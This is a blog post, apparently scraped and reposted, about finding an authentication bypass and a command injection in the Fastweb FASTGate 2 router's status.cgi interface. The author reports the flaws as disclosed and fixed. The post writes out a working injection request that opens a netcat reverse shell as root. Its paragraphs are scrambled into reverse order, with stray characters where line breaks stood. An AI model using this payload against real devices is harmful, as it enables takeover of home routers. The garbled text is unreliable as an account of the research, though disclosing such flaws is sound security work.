colorskvm.blogg.se

This was enough to get a full reverse shell into the system, and guess what? The process is running as root so we get full access to the device.įigure 4 - Exploit executed to get a shellįor documentation purpose, the vulnerable software version that I tested is the v1.0.1b, with firmware version 0.00.47_FW_200_Askey 17:31:59. GET /status.cgi?cmd=3&nvget=login_confirm&password=AA'$(`/statusapi/usr/bin/nc%20LHOST%20LPORT%20-e%20/bin/bash`)AAremember_me=1&username=admin HTTP/1.1 What I noticed was that the web application was simply sending AJAX requests to a cgi binary, called status.cgi, using a parameter called nvget to specify the action.įor example, the following GET request was enough to list all devices connected to the router, even in the past, with their assigned IP, their MAC address and their hostname: The first thing I noticed was that the login request did not return any cookie nor any token to the client and this made me suspicious: did they implement some authentication at all? I logged in and started to browse some pages and execute actions in order to understand how requests were handled. The first screen I got was the login panel, as shown in figure 1. Goal of the night: popping up a shell!\įirst step was to set up Burp Suite as a proxy and navigate a bit through the webpages to save some request and response. Working as a penetration tester, and having the possibility to test it out, I started to analyze its web interface in order to find some vulnerabilities that could give me some unintended access to it.

Since around march 2017 the company started to ship a new modem to its client: the FASTGate 2.

FASTGate: the latest generation modem from Fastwebįastweb 1 is an Italian telecommunications company that provides internet services. Thanks to these vulnerabilities I was able to bypass the authentication layer as well as execute arbitrary code via command injection and get a reverse shell back to the router.Īll vulnerabilities have been disclosed to Fastweb and are fixed in newer versions of the firmware. This blog post describes how I found a couple of vulnerabilities in the FASTGate modem/router provided by Fastweb, an Italian telecommunication company, to its clients.